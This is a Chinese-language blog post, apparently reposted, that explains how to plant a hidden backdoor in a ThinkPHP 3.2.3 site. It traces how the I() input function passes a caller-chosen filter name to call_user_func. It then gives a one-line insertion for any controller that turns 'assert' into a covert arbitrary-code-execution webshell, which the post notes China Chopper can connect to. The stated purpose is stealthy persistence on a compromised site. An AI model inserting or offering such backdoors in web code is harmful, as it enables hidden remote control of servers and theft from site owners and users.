歡迎來到阿八個人博客網(wǎng)站。本

阿八個人博客

網(wǎng)站提供最新的站長新聞,各種互聯(lián)網(wǎng)資訊。

喜歡本站的朋友可以收藏本站,或者加QQ:我們大家一起來交流技術!

URL鏈接：https://www.abboke.com/rz/2019/1010/116721.html

90sec上有人問，我說了還有小白不會用。去年我審計TP的時候留意到的，干脆分析一下代碼和操作過程。

thinkphp的I函數(shù)，是其處理輸入的函數(shù)，一般用法為I('get.id')——從$_GET數(shù)組中取出鍵為id的值，post、cookie類似。

let me see see I函數(shù)的代碼：

codehilite"><?phpfunction I($name, $default = '', $filter = null, $datas = null){ ... if ('' == $name) { // 獲取全部變量 $data = $input; $filters = isset($filter) ? $filter : C('DEFAULT_FILTER'); if ($filters) { if (is_string($filters)) { $filters = explode(',', $filters); } foreach ($filters as $filter) { $data = array_map_recursive($filter, $data); // 參數(shù)過濾 } } } elseif (isset($input[$name])) { // 取值操作 $data = $input[$name]; $filters = isset($filter) ? $filter : C('DEFAULT_FILTER'); if ($filters) { if (is_string($filters)) { if (0 === strpos($filters, '/')) { if (1 !== preg_match($filters, (string) $data)) { // 支持正則驗證 return isset($default) ? $default : null; } } else { $filters = explode(',', $filters); } } elseif (is_int($filters)) { $filters = array($filters); } if (is_array($filters)) { foreach ($filters as $filter) { if (function_exists($filter)) { $data = is_array($data) ? array_map_recursive($filter, $data) : $filter($data); // 參數(shù)過濾 } else { $data = filter_var($data, is_int($filter) ? $filter : filter_id($filter)); if (false === $data) { return isset($default) ? $default : null; } } } } } ... return $data;}

I函數(shù)的第三個參數(shù)是$filter，作用是對變量的過濾。

新版本(3.2.3)中，$filter可以傳入兩種4種值：一個過濾函數(shù)(字符串)一些過濾函數(shù)組成的字符串，其間用“|”分割一些過濾函數(shù)的字符串組成的數(shù)組以“/”開頭的正則表達式

可見代碼，若$filter為空的話，其默認值為C('DEFAULT_FILTER')。我們在配置文件中可以看到，DEFAULT_FILTER=htmlspecialchars

以上4個情況最后歸為兩個，1是過濾回調(diào)函數(shù)，2是過濾的正則。正則部分如下：

codehilite"><?phpif (0 === strpos($filters, '/')) { if (1 !== preg_match($filters, (string) $data)) { // 支持正則驗證 return isset($default) ? $default : null; }}

如果第0個字符是/，則說明傳入的是正則，用preg_match進行匹配驗證，不匹配則返回默認值$default。

而回調(diào)函數(shù)部分，是我們留后門的關鍵。核心是這一段：

codehilite"><?phpif (is_array($filters)) { foreach ($filters as $filter) { if (function_exists($filter)) { $data = is_array($data) ? array_map_recursive($filter, $data) : $filter($data); // 參數(shù)過濾 } else { $data = filter_var($data, is_int($filter) ? $filter : filter_id($filter)); if (false === $data) { return isset($default) ? $default : null; } } }}

如果函數(shù)存在，則直接調(diào)用array_map_recursive執(zhí)行。如果函數(shù)不存在，則用php默認的過濾器filter_var進行過濾。

我們跟進array_map_recursive函數(shù)：

codehilite"><?phpfunction array_map_recursive($filter, $data){ $result = array(); foreach ($data as $key => $val) { $result[$key] = is_array($val) ? array_map_recursive($filter, $val) : call_user_func($filter, $val); } return $result;}

明顯是一個遞歸執(zhí)行的過程，最后調(diào)用的是call_user_func 。

還記得我說過的php回調(diào)后門么(https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html)，ThinkPHP厚道，居然給我們預置了一個回調(diào)后門，讓我們可以萬分隱蔽的留下webshell。

所以，我們只需要隨意找個controller，在可訪問的方法中插入：

codehilite">I('post.90sec', '', I('get.i'));

如上，第三個參數(shù)就是剛說的$filter，我們只需要把回調(diào)后門函數(shù)名字(assert)作為第三個參數(shù)傳入，即可構造一個回調(diào)后門。

我就拿thinkphp默認的IndexController下的index方法示例：

如下即可執(zhí)行任意代碼：

一個回調(diào)后門，菜刀也可以連接。

總結

以上是生活随笔為你收集整理的php如何留后门,ThinkPHP留后门技巧的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。